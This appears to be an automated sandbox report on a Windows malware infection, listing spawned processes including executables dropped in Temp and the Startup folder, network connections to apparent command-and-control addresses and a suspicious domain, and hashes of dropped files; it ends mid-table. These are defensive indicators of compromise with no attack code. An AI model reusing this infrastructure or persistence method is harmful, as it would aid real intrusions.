C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5416 -childID 4 -isForBrowser -prefsHandle 5492 -prefMapHandle 5488 -prefsLen 26944 -prefMapSize 244658 -jsInitHandle 1108 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f3937819-f7b2-46f7-9f51-ae8e9d2418ab} 2880 "\\.\pipe\gecko-crash-server-pipe.2880" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5596 -childID 5 -isForBrowser -prefsHandle 5676 -prefMapHandle 5672 -prefsLen 26944 -prefMapSize 244658 -jsInitHandle 1108 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ca4c65d0-a348-498a-8838-8911e4f0343b} 2880 "\\.\pipe\gecko-crash-server-pipe.2880" tab
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DataStore1.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DataStore1.exe"
C:\Users\Admin\AppData\Local\Temp\1006068001\lum250.exe
"C:\Users\Admin\AppData\Local\Temp\1006068001\lum250.exe"
C:\Users\Admin\AppData\Local\Temp\1006149001\6d59325afb.exe
"C:\Users\Admin\AppData\Local\Temp\1006149001\6d59325afb.exe"
C:\Users\Admin\AppData\Local\Temp\1006150001\03f4141975.exe
"C:\Users\Admin\AppData\Local\Temp\1006150001\03f4141975.exe"
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
"C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=6d59325afb.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7fff485d46f8,0x7fff485d4708,0x7fff485d4718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2168,2709375927139857413,5082292317771077548,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2212 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2168,2709375927139857413,5082292317771077548,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2328 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2168,2709375927139857413,5082292317771077548,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3040 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,2709375927139857413,5082292317771077548,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3460 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,2709375927139857413,5082292317771077548,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3472 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,2709375927139857413,5082292317771077548,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5044 /prefetch:1
C:\Users\Admin\AppData\Local\Temp\1006152001\d6eb7e4fd8.exe
"C:\Users\Admin\AppData\Local\Temp\1006152001\d6eb7e4fd8.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2168,2709375927139857413,5082292317771077548,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5360 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2168,2709375927139857413,5082292317771077548,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5360 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,2709375927139857413,5082292317771077548,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5356 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,2709375927139857413,5082292317771077548,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5448 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,2709375927139857413,5082292317771077548,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5648 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,2709375927139857413,5082292317771077548,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5136 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=6d59325afb.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x16c,0x170,0x174,0x148,0x178,0x7fff485d46f8,0x7fff485d4708,0x7fff485d4718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,2709375927139857413,5082292317771077548,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5672 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,2709375927139857413,5082292317771077548,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5804 /prefetch:1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 104.219.191.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 83.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 76.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | frogmen-smell.sbs | udp |
| US | 172.67.174.133:443 | frogmen-smell.sbs | tcp |
| US | 8.8.8.8:53 | 133.174.67.172.in-addr.arpa | udp |
| US | 172.67.174.133:443 | frogmen-smell.sbs | tcp |
| RU | 185.215.113.43:80 | 185.215.113.43 | tcp |
| US | 172.67.174.133:443 | frogmen-smell.sbs | tcp |
| US | 172.67.174.133:443 | frogmen-smell.sbs | tcp |
| US | 8.8.8.8:53 | 43.113.215.185.in-addr.arpa | udp |
| RU | 31.41.244.11:80 | 31.41.244.11 | tcp |
| US | 172.67.174.133:443 | frogmen-smell.sbs | tcp |
| US | 8.8.8.8:53 | 11.244.41.31.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 172.67.174.133:443 | frogmen-smell.sbs | tcp |
| RU | 185.215.113.16:80 | 185.215.113.16 | tcp |
| US | 8.8.8.8:53 | 53.210.109.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 16.113.215.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | learn.microsoft.com | udp |
| US | 23.192.22.89:443 | learn.microsoft.com | tcp |
| US | 8.8.8.8:53 | 67.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 89.22.192.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.26.192.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | wcpstatic.microsoft.com | udp |
| US | 8.8.8.8:53 | js.monitor.azure.com | udp |
| US | 13.107.246.64:443 | js.monitor.azure.com | tcp |
| US | 13.107.246.64:443 | js.monitor.azure.com | tcp |
| US | 8.8.8.8:53 | mdec.nelreports.net | udp |
| GB | 2.20.12.100:443 | mdec.nelreports.net | tcp |
| US | 8.8.8.8:53 | 64.246.107.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 100.12.20.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | browser.events.data.microsoft.com | udp |
| US | 20.189.173.8:443 | browser.events.data.microsoft.com | tcp |
| US | 20.189.173.8:443 | browser.events.data.microsoft.com | tcp |
| N/A | 224.0.0.251:5353 | udp | |
| US | 20.189.173.8:443 | browser.events.data.microsoft.com | tcp |
| RU | 185.215.113.206:80 | 185.215.113.206 | tcp |
| US | 8.8.8.8:53 | 206.113.215.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 172.217.16.228:443 | www.google.com | tcp |
| GB | 172.217.16.228:443 | www.google.com | udp |
| US | 8.8.8.8:53 | 202.212.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 99.201.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.16.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | clients2.google.com | udp |
| GB | 142.250.178.14:443 | clients2.google.com | tcp |
| GB | 142.250.178.14:443 | clients2.google.com | tcp |
| US | 8.8.8.8:53 | clients2.googleusercontent.com | udp |
| GB | 216.58.201.97:443 | clients2.googleusercontent.com | tcp |
| US | 8.8.8.8:53 | 14.178.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.201.58.216.in-addr.arpa | udp |
| RU | 185.215.113.206:80 | 185.215.113.206 | tcp |
| N/A | 127.0.0.1:9229 | tcp | |
| N/A | 127.0.0.1:9229 | tcp | |
| N/A | 127.0.0.1:9229 | tcp | |
| US | 8.8.8.8:53 | nw-umwatson.events.data.microsoft.com | udp |
| US | 20.189.173.20:443 | nw-umwatson.events.data.microsoft.com | tcp |
| US | 8.8.8.8:53 | 20.173.189.20.in-addr.arpa | udp |
| N/A | 127.0.0.1:9229 | tcp | |
| RU | 185.215.113.206:80 | 185.215.113.206 | tcp |
| US | 8.8.8.8:53 | 30.243.111.52.in-addr.arpa | udp |
| RU | 185.215.113.16:80 | 185.215.113.16 | tcp |
| RU | 185.215.113.43:80 | 185.215.113.43 | tcp |
| US | 8.8.8.8:53 | cdn.discordapp.com | udp |
| US | 162.159.133.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| GB | 216.58.201.99:80 | c.pki.goog | tcp |
| US | 8.8.8.8:53 | 233.133.159.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | youtube.com | udp |
| US | 8.8.8.8:53 | spocs.getpocket.com | udp |
| US | 8.8.8.8:53 | firefox-api-proxy.cdn.mozilla.net | udp |
| US | 8.8.8.8:53 | youtube.com | udp |
| GB | 142.250.179.238:443 | youtube.com | tcp |
| GB | 142.250.179.238:443 | youtube.com | tcp |
| US | 8.8.8.8:53 | firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net | udp |
| US | 34.149.97.1:443 | firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net | tcp |
| US | 8.8.8.8:53 | prod.ads.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | youtube.com | udp |
| US | 8.8.8.8:53 | prod.content-signature-chains.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net | udp |
| US | 8.8.8.8:53 | prod.ads.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | shavar.prod.mozaws.net | udp |
| US | 8.8.8.8:53 | shavar.prod.mozaws.net | udp |
| US | 8.8.8.8:53 | prod.remote-settings.prod.webservices.mozgcp.net | udp |
| US | 34.149.97.1:443 | firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net | udp |
| US | 8.8.8.8:53 | prod.remote-settings.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | 115.230.163.35.in-addr.arpa | udp |
| GB | 142.250.179.238:443 | youtube.com | udp |
| US | 8.8.8.8:53 | www.youtube.com | udp |
| GB | 216.58.204.78:443 | www.youtube.com | tcp |
| US | 8.8.8.8:53 | youtube-ui.l.google.com | udp |
| US | 8.8.8.8:53 | youtube-ui.l.google.com | udp |
| US | 8.8.8.8:53 | firefox-settings-attachments.cdn.mozilla.net | udp |
| US | 34.117.121.53:443 | firefox-settings-attachments.cdn.mozilla.net | tcp |
| US | 8.8.8.8:53 | attachments.prod.remote-settings.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | attachments.prod.remote-settings.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | 78.204.58.216.in-addr.arpa | udp |
| GB | 216.58.204.78:443 | youtube-ui.l.google.com | udp |
| US | 8.8.8.8:53 | consent.youtube.com | udp |
| US | 8.8.8.8:53 | consent.youtube.com | udp |
| GB | 216.58.204.78:443 | consent.youtube.com | tcp |
| US | 8.8.8.8:53 | consent.youtube.com | udp |
| GB | 216.58.204.78:443 | consent.youtube.com | udp |
| US | 8.8.8.8:53 | 3.178.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 74.169.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 227.16.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| US | 8.8.8.8:53 | prod.content-signature-chains.prod.webservices.mozgcp.net | udp |
| GB | 172.217.16.228:443 | www.google.com | tcp |
| US | 8.8.8.8:53 | www.google.com | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| N/A | 127.0.0.1:52048 | tcp | |
| GB | 172.217.16.228:443 | www.google.com | udp |
| US | 172.67.174.133:443 | frogmen-smell.sbs | tcp |
| N/A | 127.0.0.1:52057 | tcp | |
| US | 172.67.174.133:443 | frogmen-smell.sbs | tcp |
| US | 172.67.174.133:443 | frogmen-smell.sbs | tcp |
| US | 172.67.174.133:443 | frogmen-smell.sbs | tcp |
| RU | 185.215.113.16:80 | 185.215.113.16 | tcp |
| US | 172.67.174.133:443 | frogmen-smell.sbs | tcp |
| US | 172.67.174.133:443 | frogmen-smell.sbs | tcp |
| US | 172.67.174.133:443 | frogmen-smell.sbs | tcp |
| US | 172.67.174.133:443 | frogmen-smell.sbs | tcp |
| US | 172.67.174.133:443 | frogmen-smell.sbs | tcp |
| US | 172.67.174.133:443 | frogmen-smell.sbs | tcp |
| US | 172.67.174.133:443 | frogmen-smell.sbs | tcp |
| US | 172.67.174.133:443 | frogmen-smell.sbs | tcp |
| RU | 185.215.113.16:80 | 185.215.113.16 | tcp |
| RU | 185.215.113.206:80 | 185.215.113.206 | tcp |
| US | 8.8.8.8:53 | learn.microsoft.com | udp |
| US | 23.192.22.89:443 | learn.microsoft.com | tcp |
| US | 8.8.8.8:53 | browser.events.data.microsoft.com | udp |
| US | 20.189.173.18:443 | browser.events.data.microsoft.com | tcp |
| US | 20.189.173.18:443 | browser.events.data.microsoft.com | tcp |
| US | 8.8.8.8:53 | 18.173.189.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | location.services.mozilla.com | udp |
| US | 8.8.8.8:53 | prod.balrog.prod.cloudops.mozgcp.net | udp |
| US | 35.190.72.216:443 | location.services.mozilla.com | tcp |
| US | 8.8.8.8:53 | prod.classify-client.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | prod.balrog.prod.cloudops.mozgcp.net | udp |
| US | 8.8.8.8:53 | prod.classify-client.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | 201.181.244.35.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 216.72.190.35.in-addr.arpa | udp |
| US | 35.190.72.216:443 | prod.classify-client.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | prod.content-signature-chains.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | ciscobinary.openh264.org | udp |
| US | 8.8.8.8:53 | redirector.gvt1.com | udp |
| GB | 88.221.134.155:80 | ciscobinary.openh264.org | tcp |
| US | 8.8.8.8:53 | a19.dscg10.akamai.net | udp |
| US | 8.8.8.8:53 | redirector.gvt1.com | udp |
| GB | 172.217.16.238:443 | redirector.gvt1.com | tcp |
| US | 8.8.8.8:53 | a19.dscg10.akamai.net | udp |
| US | 8.8.8.8:53 | redirector.gvt1.com | udp |
| GB | 172.217.16.238:443 | redirector.gvt1.com | udp |
| US | 8.8.8.8:53 | r4---sn-aigzrnsz.gvt1.com | udp |
| GB | 74.125.175.169:443 | r4---sn-aigzrnsz.gvt1.com | tcp |
| US | 8.8.8.8:53 | r4.sn-aigzrnsz.gvt1.com | udp |
| US | 8.8.8.8:53 | r4.sn-aigzrnsz.gvt1.com | udp |
| GB | 74.125.175.169:443 | r4.sn-aigzrnsz.gvt1.com | udp |
| US | 8.8.8.8:53 | 155.134.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 238.16.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 169.175.125.74.in-addr.arpa | udp |
| US | 8.8.8.8:53 | play.google.com | udp |
| GB | 142.250.187.206:443 | play.google.com | tcp |
| US | 8.8.8.8:53 | play.google.com | udp |
| US | 8.8.8.8:53 | play.google.com | udp |
| GB | 142.250.187.206:443 | play.google.com | udp |
Files
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\u7L07.exe
| MD5 | d16a9a20eaf5f05d24cc4068700d4cb0 |
| SHA1 | e4c675cb0252e375441c57cfb1a477098a1453a7 |
| SHA256 | bf52a8be51053f176cac4bb3feffd4e88842bf19a4e8826442f21e2b958bdb08 |
| SHA512 | 21554084434a99b3cdf10aea8041241585d250b947be53133fe837a8b718ad191dce87ac3663c14c33fbf927350c3b58b1bae604da1d19418ae5b02b7586ac84 |
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\A2M26.exe
| MD5 | 838b6ec9038cb77d08ead88bb5e38e2c |
| SHA1 | 5c7ab06dc90fe071dda6a660755f21f65d5a226c |
| SHA256 | 98d428e726413cd0ecde1f8500d5c7693adddf8c74890e188db92153d5855a44 |
| SHA512 | c271e4ab76b16540895cbd8dc2fb7f82c2937fa94ecc00bbead15f4fb2f0d526b81164818c9288301f05b8cd8275b8d94e5783c3b8cdd9f92c8c06c06d05de3f |
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1T30C8.exe
| MD5 | 59d6936a7cf3bcb1a47d5c2578ed349f |
| SHA1 | ff193ea80fbff6f7643b73cbe939ba749921e020 |
| SHA256 | 1e1cc9faa8264d448f764470e3e69dd3eca39b9cae9ff05d26f50bf2d6e4dc1f |
| SHA512 | 55375ba1b2b8e8308a61c699fae91ed342d4302ff279d5856dd2cdd91f023f327568bc9e7d43b291bff16e3d6611f7ac3fb43abf4f70dca7799138d50fbc2ebe |
memory/3432-21-0x0000000000F30000-0x000000000125B000-memory.dmp
memory/1928-33-0x0000000000C50000-0x0000000000F7B000-memory.dmp
memory/3432-32-0x0000000000F30000-0x000000000125B000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\2r5367.exe
| MD5 | 02d2fe5eaa2cd0273701cba643a85275 |
| SHA1 | b22e5f9d24b5b20a400bc2fb4343952b092c266d |
| SHA256 | fa9b3263042b364913cf7d0773da1c66ef85d967c61c60c2dbbdaa9495dfb855 |
| SHA512 | 20fa55013785d6edebf82e291e3aaa5e3d60f74041c7496c52f751241f58fe5bc9a388267538ae5ec1d50fd76d9d4674848fa18f328413a9a2f4bdc90008e527 |
memory/2024-38-0x0000000000AA0000-0x0000000000D9D000-memory.dmp
memory/1928-39-0x0000000000C50000-0x0000000000F7B000-memory.dmp
memory/1928-40-0x0000000000C50000-0x0000000000F7B000-memory.dmp
memory/2024-42-0x0000000000AA0000-0x0000000000D9D000-memory.dmp
memory/1928-43-0x0000000000C50000-0x0000000000F7B000-memory.dmp
memory/2024-44-0x0000000000AA0000-0x0000000000D9D000-memory.dmp
memory/1928-45-0x0000000000C50000-0x0000000000F7B000-memory.dmp
memory/2024-46-0x0000000000AA0000-0x0000000000D9D000-memory.dmp
memory/2024-48-0x00000000068A0000-0x0000000006B64000-memory.dmp
memory/2024-47-0x00000000068A0000-0x0000000006B64000-memory.dmp
memory/2024-66-0x00000000068A0000-0x0000000006B64000-memory.dmp
memory/2024-68-0x00000000068A0000-0x0000000006B64000-memory.dmp
memory/2024-77-0x00000000068A0000-0x0000000006B64000-memory.dmp
memory/2024-78-0x00000000068A0000-0x0000000006B64000-memory.dmp
memory/2024-76-0x00000000068A0000-0x0000000006B64000-memory.dmp
memory/2024-75-0x00000000068A0000-0x0000000006B64000-memory.dmp
memory/2024-74-0x00000000068A0000-0x0000000006B64000-memory.dmp
memory/2024-73-0x00000000068A0000-0x0000000006B64000-memory.dmp
memory/2024-80-0x00000000068A0000-0x0000000006B64000-memory.dmp
memory/4968-84-0x0000000000C50000-0x0000000000F7B000-memory.dmp
memory/2024-82-0x00000000068A0000-0x0000000006B64000-memory.dmp
memory/2024-79-0x00000000068A0000-0x0000000006B64000-memory.dmp
memory/2024-81-0x00000000068A0000-0x0000000006B64000-memory.dmp
memory/2024-72-0x00000000068A0000-0x0000000006B64000-memory.dmp
memory/2024-71-0x00000000068A0000-0x0000000006B64000-memory.dmp
memory/2024-70-0x00000000068A0000-0x0000000006B64000-memory.dmp
memory/2024-69-0x00000000068A0000-0x0000000006B64000-memory.dmp
memory/2024-67-0x00000000068A0000-0x0000000006B64000-memory.dmp
memory/2024-65-0x00000000068A0000-0x0000000006B64000-memory.dmp
memory/2024-63-0x00000000068A0000-0x0000000006B64000-memory.dmp
memory/2024-62-0x00000000068A0000-0x0000000006B64000-memory.dmp
memory/2024-61-0x00000000068A0000-0x0000000006B64000-memory.dmp
memory/2024-60-0x00000000068A0000-0x0000000006B64000-memory.dmp
memory/2024-58-0x00000000068A0000-0x0000000006B64000-memory.dmp
memory/2024-57-0x00000000068A0000-0x0000000006B64000-memory.dmp
memory/2024-56-0x00000000068A0000-0x0000000006B64000-memory.dmp
memory/2024-64-0x00000000068A0000-0x0000000006B64000-memory.dmp
memory/2024-59-0x00000000068A0000-0x0000000006B64000-memory.dmp
memory/2024-55-0x00000000068A0000-0x0000000006B64000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | f426165d1e5f7df1b7a3758c306cd4ae |
| SHA1 | 59ef728fbbb5c4197600f61daec48556fec651c1 |
| SHA256 | b68dfc21866d0abe5c75d70acc54670421fa9b26baf98af852768676a901b841 |
| SHA512 | 8d437fcb85acb0705bf080141e7a021740901248985a76299ea8c43e46ad78fb88c738322cf302f6a550caa5e79d85b36827e9b329b1094521b17cf638c015b6 |
\??\pipe\LOCAL\crashpad_3704_WSTTDTLAXJRXBPLD
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 6960857d16aadfa79d36df8ebbf0e423 |
| SHA1 | e1db43bd478274366621a8c6497e270d46c6ed4f |
| SHA256 | f40b812ce44e391423eb66602ac0af138a1e948aa8c4116045fef671ef21cd32 |
| SHA512 | 6deb2a63055a643759dd0ae125fb2f68ec04a443dbf8b066a812b42352bbcfa4517382ed0910c190c986a864559c3453c772e153ee2e9432fb2de2e1e49ca7fe |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 88eec4fafbc598644f8dbbfc24c57dfd |
| SHA1 | 90c4eb4b738600ba4559195946a6c23236b42db0 |
| SHA256 | 767495844bfabcaf56dd54e7f5e75adf87669333cc1b9359257f77c9bde494f9 |
| SHA512 | 50d485a10429dda90bb0481644611aba7dec61fa253a531629c9cec05fc554f01a4a2f350025afbf01f2f776469378f9c6de63d49001dad9b59db24aa76c99ab |
memory/1928-134-0x0000000000C50000-0x0000000000F7B000-memory.dmp
memory/2024-135-0x0000000000AA0000-0x0000000000D9D000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
| MD5 | 6752a1d65b201c13b62ea44016eb221f |
| SHA1 | 58ecf154d01a62233ed7fb494ace3c3d4ffce08b |
| SHA256 | 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd |
| SHA512 | 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 7bd934067677a82d1f706bd67227d165 |
